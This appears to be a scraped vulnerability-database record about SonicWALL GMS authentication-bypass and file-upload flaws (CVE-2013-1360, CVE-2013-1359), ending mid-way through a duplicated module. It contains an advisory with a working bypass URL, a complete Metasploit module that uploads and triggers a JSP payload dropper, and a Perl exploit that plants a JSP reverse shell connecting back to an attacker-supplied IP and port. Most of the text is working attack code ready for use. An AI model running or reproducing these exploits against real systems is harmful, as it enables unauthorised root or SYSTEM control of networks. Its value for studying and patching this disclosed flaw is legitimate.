GMS/Analyzer/UMA 7.0.x \nGMS/ViewPoint/UMA 6.0.x \nGMS/ViewPoint/UMA 5.1.x \nGMS/ViewPoint 5.0.x \nGMS/ViewPoint 4.1.x \nRemote Exploitable: Yes \nLocal Exploitable: No \nPatch Status: Vendor released a patch (See Solution) \nDiscovered by: Nikolas Sotiriu \n \n \n \nBackground: \n=========== \n \nThe SonicWALL\u00ae Global Management System (GMS) provides organizations, \ndistributed enterprises and service providers with a powerful and \nintuitive solution to centrally manage and rapidly deploy SonicWALL \nfirewall, anti-spam, backup and recovery, and secure remote access \nsolutions. Flexibly deployed as software, hardware, or a virtual \nappliance, SonicWALL GMS offers centralized real-time monitoring, and \ncomprehensive policy and compliance reporting. For enterprise customers, \nSonicWALL GMS streamlines security policy management and appliance \ndeployment, minimizing administration overhead. Service Providers can \nuse GMS to simplify the security management of multiple clients and \ncreate additional revenue opportunities. For added redundancy and \nscalability, GMS can be deployed in a cluster configuration. \n \n(Product description from Website) \n \n \n \nDescription: \n============ \n \nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that \nallows an unauthenticated, remote attacker to bypass the Web interface \nauthentication offered by the affected product. \n \nThe vulnerability is attributed to a broken session handling in the \nprocess of password change process of the web application. \nchanging in the web application. \n \nAn attacker may exploit this vulnerability by sending a specially \ncrafted request to the SGMS Interface (/sgms/). \n \nThe attacker gains full administrative access to the interface and \nfull control over all managed appliances, which could lead to a full \ncompromisation of the organisation. \n \n \n \nProof of Concept : \n================== \n \nAccess the following URL to login to the sgms interface: \n \nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 \n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 \n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 \n00000000001 \n \nIf the Console is not directly shown, type any password you \nwant in the change password dialog twice and hit submit to login. \n \nMaybe you need to access the following URL after this process: \n \nhttp://host/sgms/auth \n \n \n \nSolution: \n========= \n \nInstall Hotfix 125076.77. (Download from www.mysonicwall.com) \n \n \n \nDisclosure Timeline: \n==================== \n \n2012-04-26: Vulnerability found \n2012-12-12: Sent the notification and disclosure policy and asked \nfor a PGP Key (security@sonicwall.com) \n2012-12-13: Sent advisory, disclosure policy and planned disclosure \ndate (2012-12-28) to vendor \n2012-12-18: SonicWALL analyzed the finding and wishes to delay the \nrelease to the 3. calendar week 2013. \n2012-12-18: Changed release date to 2013-01-17. \n2012-12-20: Patch is published \n2013-01-17: Release of this advisory \n \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/119639/NSOADV-2013-002.txt"}, {"lastseen": "2016-12-05T22:23:04", "references": [], "edition": 1, "description": "", "reporter": "Nikolas Sotiriu", "published": "2013-01-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "SonicWALL GMS 6 Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1359"], "modified": "2013-01-25T00:00:00", "href": "https://packetstormsecurity.com/files/119808/SonicWALL-GMS-6-Arbitrary-File-Upload.html", "id": "PACKETSTORM:119808", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a code execution flaw in SonicWALL GMS. It exploits two \nvulnerabilities in order to get its objective. An authentication bypass in the \nWeb Administration interface allows to abuse the \"appliance\" application and upload \nan arbitrary payload embedded in a JSP. The module has been tested successfully on \nSonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual \nAppliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run \nsuccessfully while testing, shell payload have been used. \n}, \n'Author' => \n[ \n'Nikolas Sotiriu', # Vulnerability Discovery \n'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-1359'], \n[ 'OSVDB', '89347' ], \n[ 'BID', '57445' ], \n[ 'EDB', '24204' ] \n], \n'Privileged' => true, \n'Platform' => [ 'win', 'linux' ], \n'Targets' => \n[ \n[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 17 2012')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) \n], self.class) \nend \n \n \ndef on_new_session \n# on_new_session will force stdapi to load (for Linux meterpreter) \nend \n \n \ndef generate_jsp \nvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_data = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_counter = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_comb = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_exe = Rex::Text.rand_text_alpha(rand(8)+8) \n@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_proc = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8) \nvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8) \n \njspraw = \"<%@ page import=\\\"java.io.*\\\" %>\\n\" \njspraw << \"<%\\n\" \njspraw << \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\" \njspraw << \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\" \njspraw << \"String #{var_data} = \\\"\\\";\\n\" \n \njspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\" \njspraw << \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\" \njspraw << \"}\\n\" \n \njspraw << \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\" \njspraw << \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\" \n \njspraw << \"int #{var_numbytes} = #{var_inputstream}.available();\\n\" \njspraw << \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\" \njspraw << \"#{var_inputstream}.read(#{var_bytearray});\\n\" \njspraw << \"#{var_inputstream}.close();\\n\" \n \njspraw << \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\" \njspraw << \"for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\\n\" \njspraw << \"{\\n\" \njspraw << \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\" \njspraw << \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\" \njspraw << \"int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\\n\" \njspraw << \"#{var_comb} <<= 4;\\n\" \njspraw << \"#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\\n\" \njspraw << \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\" \njspraw << \"}\\n\" \n \njspraw << \"#{var_outputstream}.write(#{var_bytes});\\n\" \njspraw << \"#{var_outputstream}.close();\\n\" \n \njspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\" \njspraw << \"String[] #{var_fperm} = new String[3];\\n\" \njspraw << \"#{var_fperm}[0] = \\\"chmod\\\";\\n\" \njspraw << \"#{var_fperm}[1] = \\\"+x\\\";\\n\" \njspraw << \"#{var_fperm}[2] = #{var_exepath};\\n\" \njspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\" \njspraw << \"if (#{var_proc}.waitFor() == 0) {\\n\" \njspraw << \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\" \njspraw << \"}\\n\" \n# Linux and other UNICES allow removing files while they are in use... \njspraw << \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\" \njspraw << \"} else {\\n\" \n# Windows does not .. \njspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\" \njspraw << \"}\\n\" \n \njspraw << \"%>\\n\" \nreturn jspraw \nend \n \ndef get_install_path \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\", \n'method' => 'POST', \n'connection' => 'TE, close', \n'headers' => \n{ \n'TE' => \"deflate,gzip;q=0.3\", \n}, \n'vars_post' => { \n'num' => '123456', \n'action' => 'show_diagnostics', \n'task' => 'search', \n'item' => 'application_log', \n'criteria' => '*.*', \n'width' => '500' \n} \n}) \n \nif res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/ \nreturn $1 \nend \n \nreturn nil \nend \n \ndef upload_file(location, filename, contents) \npost_data = Rex::MIME::Message.new \npost_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\") \npost_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\") \npost_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\") \npost_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; filename=\\\"#{filename}\\\"\") \n \ndata = post_data.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\", \n'method' => 'POST', \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'headers' => \n{ \n'TE' => \"deflate,gzip;q=0.3\", \n}, \n'connection' => 'TE, close' \n}) \n \nif res and res.code == 200 and res.body.empty? \nreturn true \nelse \nreturn false \nend \nend \n \ndef check \n@peer = \"#{rhost}:#{rport}\" \n@uri = normalize_uri(target_uri.path) \n@uri << '/' if @uri[-1,1] != '/' \n \nif get_install_path.nil? \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \n@peer = \"#{rhost}:#{rport}\" \n@uri = normalize_uri(target_uri.path) \n@uri << '/' if @uri[-1,1] != '/' \n \n# Get Tomcat installation path \nprint_status(\"#{@peer} - Retrieving Tomcat installation path...\") \ninstall_path = get_install_path \n \nif install_path.nil? \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Unable to retrieve the Tomcat installation path\") \nend \n \nprint_good(\"#{@peer} - Tomcat installed on #{install_path}\") \n \nif target['Platform'] == \"linux\" \n@location = \"#{install_path}webapps/appliance/\" \nelsif target['Platform'] == \"win\" \n@location = \"#{install_path}webapps\\\\appliance\\\\\" \nend \n \n \n# Upload the JSP and the raw payload \n@jsp_name = rand_text_alphanumeric(8+rand(8)) \n \njspraw = generate_jsp \n \n# Specify the payload in hex as an extra file.. \npayload_hex = payload.encoded_exe.unpack('H*')[0] \n \nprint_status(\"#{@peer} - Uploading the payload\") \n \nif upload_file(@location, \"#{@var_hexfile}.txt\", payload_hex) \nprint_good(\"#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt\") \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the Payload\") \nend \n \nprint_status(\"#{@peer} - Uploading the payload\") \n \nif upload_file(@location, \"#{@jsp_name}.jsp\", jspraw) \nprint_good(\"#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp\") \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the jsp\") \nend \n \nprint_status(\"Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...\") \nres = send_request_cgi( \n{ \n'uri' => \"#{@uri}appliance/#{@jsp_name}.jsp\", \n'method' => 'GET' \n}) \n \nif res and res.code != 200 \nprint_warning(\"#{@peer} - Error triggering the payload\") \nend \n \nregister_files_for_cleanup(\"#{@location}#{@var_hexfile}.txt\") \nregister_files_for_cleanup(\"#{@location}#{@jsp_name}.jsp\") \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119808/sonicwall_gms_upload.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-02-02T22:44:59", "osvdbidlist": ["89346"], "references": [], "description": "SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass. CVE-2013-1360. Webapps exploits for multiple platform", "edition": 1, "reporter": "Nikolas Sotiriu", "published": "2013-01-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "id": "EDB-ID:24203", "href": "https://www.exploit-db.com/exploits/24203/", "sourceData": "-------------------------- NSOADV-2013-002 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/sgms/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1360\r\n CVSS Base Score: 9\r\n Impact: 8.5\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n Advisory ID: NSOADV-2013-002\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00c2\u017d Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a broken session handling in the\r\nprocess of password change process of the web application.\r\nchanging in the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a specially\r\ncrafted request to the SGMS Interface (/sgms/).\r\n\r\nThe attacker gains full administrative access to the interface and\r\nfull control over all managed appliances, which could lead to a full\r\ncompromisation of the organisation.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nAccess the following URL to login to the sgms interface:\r\n\r\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\r\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\r\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\r\n00000000001\r\n\r\nIf the Console is not directly shown, type any password you\r\nwant in the change password dialog twice and hit submit to login.\r\n\r\nMaybe you need to access the following URL after this process:\r\n\r\nhttp://host/sgms/auth\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24203/"}, {"lastseen": "2016-02-02T22:45:08", "osvdbidlist": ["89347"], "references": [], "description": "SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit. CVE-2013-1359. Webapps exploits for multiple platform", "edition": 1, "reporter": "Nikolas Sotiriu", "published": "2013-01-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1359"], "modified": "2013-01-18T00:00:00", "id": "EDB-ID:24204", "href": "https://www.exploit-db.com/exploits/24204/", "sourceData": "#!/usr/bin/perl\r\n\r\n##\r\n# Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit \r\n# Name: sgmsRCE.pl\r\n# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>\r\n#\r\n# Use it only for education or ethical pentesting! The author accepts \r\n# no liability for damage caused by this tool.\r\n# \r\n##\r\n\r\n\r\nuse strict;\r\nuse HTTP::Request::Common qw(POST);\r\nuse LWP::UserAgent;\r\nuse LWP::Protocol::https;\r\nuse Getopt::Std;\r\n\r\n\r\nmy %args;\r\ngetopt('hlp:', \\%args);\r\n\r\nmy $victim = $args{h} || usage();\r\nmy $lip = $args{l}; \r\nmy $lport = $args{p};\r\nmy $detect = $args{d};\r\nmy $shellname = \"cbs.jsp\";\r\n\r\nbanner();\r\n\r\nmy $gms_path;\r\nmy $target;\r\nmy $sysshell;\r\n\r\nmy $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);\r\n$agent->agent(\"Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0\");\r\n\r\n# Place your Proxy here if needed\r\n#$agent->proxy(['http', 'https'], 'http://localhost:8080/');\r\n\r\nprint \"[+] Checking host ...\\n\";\r\nmy $request = POST \"$victim/appliance/applianceMainPage?skipSessionCheck=1\",\r\nContent_Type => 'application/x-www-form-urlencoded; charset=UTF-8',\r\nContent => [ num => \"123456\",\r\n action => \"show_diagnostics\",\r\n task => \"search\",\r\n item => \"application_log\",\r\n criteria => \"*.*\",\r\n width => \"500\",\r\n ];\r\n\r\nmy $result = $agent->request($request);\r\n\r\nif ($result->is_success) {\r\n print \"[+] Host looks vulnerable ...\\n\";\r\n} else {\r\n print \"[-] Error while connecting ... $result->status_line\\n\";\r\n exit(0);\r\n}\r\n\r\n\r\nmy @lines=split(\"\\n\",$result->content);\r\n\r\nforeach my $line (@lines) {\r\n if ($line =~ /OPTION VALUE=/) {\r\n my @a=split(\"\\\"\", $line);\r\n if ($a[1] =~ m/logs/i) {\r\n my @b=split(/logs/i,$a[1]);\r\n $gms_path=$b[0];\r\n }\r\n if ($gms_path ne \"\") {\r\n print \"[+] GMS Path: $gms_path\\n\";\r\n last;\r\n } else {\r\n next;\r\n }\r\n }\r\n}\r\nif ($gms_path eq \"\") {\r\n print \"[-] Couldn't get the GMS path ... Maybe not vulnerable\\n\";\r\n exit(0);\r\n}\r\n\r\n\r\nif ($gms_path =~ m/^\\//) {\r\n $target=\"UNX\";\r\n $gms_path=$gms_path.\"Tomcat/webapps/appliance/\";\r\n $sysshell=\"/bin/sh\";\r\n print \"[+] Target ist Unix...\\n\";\r\n} else {\r\n $target=\"WIN\";\r\n $gms_path=$gms_path.\"Tomcat\\\\webapps\\\\appliance\\\\\";\r\n $sysshell=\"cmd.exe\";\r\n print \"[+] Target ist Windows...\\n\";\r\n}\r\n\r\n&_writing_shell;\r\n\r\nif (!$detect) {\r\nprint \"[+] Uploading shell ...\\n\";\r\nmy $request = POST \"$victim/appliance/applianceMainPage?skipSessionCheck=1\",\r\nContent_Type => 'multipart/form-data',\r\nContent => [ action => \"file_system\", \r\n task => \"uploadFile\", \r\n searchFolder => \"$gms_path\", \r\n uploadFileName => [\"$shellname\"]\r\n ];\r\n\r\nmy $result = $agent->request($request);\r\n\r\nif ($result->is_success) {\r\n print \"[+] Upload completed ...\\n\";\r\n} else {\r\n print \"[-] Error while connecting ... $result->status_line\\n\";\r\n exit(0);\r\n}\r\n\r\nunlink(\"$shellname\");\r\n\r\nprint \"[+] Spawning remote root/system shell ...\\n\";\r\nmy $result = $agent->get(\"$victim/appliance/$shellname\");\r\n\r\nif ($result->is_success) {\r\n print \"[+] Have fun ...\\n\";\r\n} else {\r\n print \"[-] Error while connecting ... $result->status_line\\n\";\r\n exit(0);\r\n}\r\n}\r\n\r\nsub _writing_shell {\r\n open FILE, \">\", \"$shellname\" or die $!;\r\n print FILE << \"EOF\";\r\n<%\\@page import=\"java.lang.*\"%>\r\n<%\\@page import=\"java.util.*\"%>\r\n<%\\@page import=\"java.io.*\"%>\r\n<%\\@page import=\"java.net.*\"%>\r\n<%\r\n class StreamConnector extends Thread\r\n {\r\n InputStream is;\r\n OutputStream os;\r\n\r\n StreamConnector( InputStream is, OutputStream os )\r\n {\r\n this.is = is;\r\n this.os = os;\r\n }\r\n public void run()\r\n {\r\n BufferedReader in = null;\r\n BufferedWriter out = null;\r\n try\r\n {\r\n in = new BufferedReader( new InputStreamReader( this.is ) );\r\n out = new BufferedWriter( new OutputStreamWriter( this.os ) );\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n out.write( buffer, 0, length );\r\n out.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( in != null )\r\n in.close();\r\n if( out != null )\r\n out.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n try\r\n {\r\n Socket socket = new Socket( \"$lip\", $lport );\r\n Process process = Runtime.getRuntime().exec( \"$sysshell\" );\r\n ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\r\n ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\r\n } catch( Exception e ) {}\r\n%>\r\n\r\nEOF\r\n\r\nclose(FILE);\r\n}\r\n\r\nsub usage {\r\n print \"\\n\";\r\n print \" $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\\n\";\r\n print \"====================================================================\\n\\n\";\r\n print \" Usage:\\n\";\r\n print \" $0 -h <http://victim> -l <yourip> -p <yourport>\\n\";\r\n print \" Notes:\\n\";\r\n print \" Start your netcat listener <nc -lp 4444>\\n\";\r\n print \" -d only checks if the Host is vulnerable\\n\";\r\n print \"\\n\";\r\n print \" Author:\\n\";\r\n print \" Nikolas Sotiriu (lofi)\\n\";\r\n print \" url: www.sotiriu.de\\n\";\r\n print \" mail: lofi[at]sotiriu.de\\n\";\r\n print \"\\n\";\r\n\r\n\r\n exit(1);\r\n}\r\n\r\nsub banner {\r\n print STDERR << \"EOF\";\r\n--------------------------------------------------------------------------------\r\n SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit\r\n--------------------------------------------------------------------------------\r\n\r\nEOF\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24204/"}, {"lastseen": "2016-02-02T23:02:25", "osvdbidlist": ["89347"], "references": [], "description": "SonicWALL GMS 6 Arbitrary File Upload. CVE-2013-1359. Remote exploits for multiple platform", "edition": 1, "reporter": "metasploit", "published": "2013-01-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "SonicWALL Gms 6 - Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1359"], "modified": "2013-01-24T00:00:00", "id": "EDB-ID:24322", "href": "https://www.exploit-db.com/exploits/24322/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::EXE\r\n\tinclude Msf::Exploit::FileDropper\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a code execution flaw in SonicWALL GMS. It exploits two\r\n\t\t\t\tvulnerabilities in order to get its objective. An authentication bypass in the\r\n\t\t\t\tWeb Administration interface allows to abuse the \"appliance\" application and upload\r\n\t\t\t\tan arbitrary payload embedded in a JSP. The module has been tested successfully on\r\n\t\t\t\tSonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual\r\n\t\t\t\tAppliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run\r\n\t\t\t\tsuccessfully while testing, shell payload have been used.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Nikolas Sotiriu', # Vulnerability Discovery\r\n\t\t\t\t\t'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2013-1359'],\r\n\t\t\t\t\t[ 'OSVDB', '89347' ],\r\n\t\t\t\t\t[ 'BID', '57445' ],\r\n\t\t\t\t\t[ 'EDB', '24204' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => [ 'win', 'linux' ],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 